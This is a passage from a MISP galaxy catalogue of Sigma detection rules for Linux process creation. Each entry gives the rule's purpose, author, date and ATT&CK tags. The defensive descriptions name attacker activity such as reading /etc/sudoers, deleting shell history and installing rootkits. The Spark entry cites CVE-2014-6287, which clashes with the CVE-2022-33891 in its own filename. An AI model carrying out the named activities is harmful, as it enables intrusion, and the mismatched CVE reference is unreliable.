UUID 067d8238-7127-451c-a9ec-fa78045b618b which can be used as unique global reference for Linux Doas Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S, Teoderick Contreras
creation_date 2022/01/20
falsepositive ['Unlikely']
filename proc_creation_lnx_doas_execution.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1548']

History File Deletion

Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity.

Internal MISP references

UUID 1182f3b3-e716-4efa-99ab-d2685d04360f which can be used as unique global reference for History File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_susp_history_delete.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.impact', 'attack.t1565.001']

Cat Sudoers

Detects execution of "cat /etc/sudoers" to list all users that have sudo rights.

Internal MISP references

UUID 0f79c4d2-4e1f-4683-9c36-b5469a665e06 which can be used as unique global reference for Cat Sudoers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_cat_sudoers.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1592.004']

Suspicious Git Clone - Linux

Detects execution of "git" in order to clone a remote repository that contains suspicious keywords.

Internal MISP references

UUID cfec9d29-64ec-4a0f-9ffe-0fdb856d5446 which can be used as unique global reference for Suspicious Git Clone - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/03
falsepositive ['Unknown']
filename proc_creation_lnx_susp_git_clone.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.reconnaissance', 'attack.t1593.003']

Pnscan Binary Data Transmission Activity

Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT.

Internal MISP references

UUID 97de11cd-4b67-4abf-9a8b-1020e670aa9e which can be used as unique global reference for Pnscan Binary Data Transmission Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett (@signalblur)
creation_date 2024/04/16
falsepositive ['Unknown']
filename proc_creation_lnx_pnscan_binary_cli_pattern.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1046']

Setuid and Setgid

Detects suspicious changes of file privileges with the chown and chmod commands.

Internal MISP references

UUID c21c4eaa-ba2e-419a-92b2-8371703cbe21 which can be used as unique global reference for Setuid and Setgid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal
creation_date 2020/06/16
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_setgid_setuid.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.persistence', 'attack.t1548.001']

Apache Spark Shell Command Injection - ProcessCreation

Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command-line perspective.

Internal MISP references

UUID c8a5f584-cdc8-42cc-8cce-0398e4265de3 which can be used as unique global reference for Apache Spark Shell Command Injection - ProcessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/20
falsepositive ['Unlikely']
filename proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.initial_access', 'attack.t1190', 'cve.2022.33891']

Potential GobRAT File Discovery Via Grep

Detects the use of grep to discover specific files created by the GobRAT malware.

Internal MISP references

UUID e34cfa0c-0a50-4210-9cb3-5632d08eb041 which can be used as unique global reference for Potential GobRAT File Discovery Via Grep in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1082']

Potentially Suspicious Execution From Tmp Folder

Detects a potentially suspicious execution of a process located in the '/tmp/' folder.

Internal MISP references

UUID 312b42b1-bded-4441-8b58-163a3af58775 which can be used as unique global reference for Potentially Suspicious Execution From Tmp Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2023/06/02
falsepositive ['Unknown']
filename proc_creation_lnx_susp_execution_tmp_folder.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1036']

Local Groups Discovery - Linux

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings.

Internal MISP references

UUID 676381a6-15ca-4d73-a9c8-6a22e970b90d which can be used as unique global reference for Local Groups Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, Alejandro Ortuno, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate administration activities']
filename proc_creation_lnx_local_groups.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1069.001']

User Added To Root/Sudoers Group Using Usermod

Detects usage of the "usermod" binary to add users to the root or sudoers groups.

Internal MISP references

UUID 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73 which can be used as unique global reference for User Added To Root/Sudoers Group Using Usermod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TuanLe (GTSC)
creation_date 2022/12/21
falsepositive ['Legitimate administrator activities']
filename proc_creation_lnx_usermod_susp_group.yml
level medium
logsource.category process_creation
logsource.product linux
tags ['attack.privilege_escalation', 'attack.persistence']

Triple Cross eBPF Rootkit Install Commands

Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script.

Internal MISP references

UUID 22236d75-d5a0-4287-bf06-c93b1770860f which can be used as unique global reference for Triple Cross eBPF Rootkit Install Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/05
falsepositive ['Unlikely']
filename proc_creation_lnx_triple_cross_rootkit_install.yml
level high
logsource.category process_creation
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1014']

Security Software Discovery - Linux

Detects usage of system utilities (only grep and egrep for now) to discover installed security software.

Internal MISP references

UUID c9d8b7fd-78e4-44fe-88f6-599135d46d60 which can be used as unique global reference for Security Software Discovery - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_lnx_security_software_discovery.yml
level low
logsource.category process_creation
logsource.product linux
tags ['attack.discovery', 'attack.t1518.001']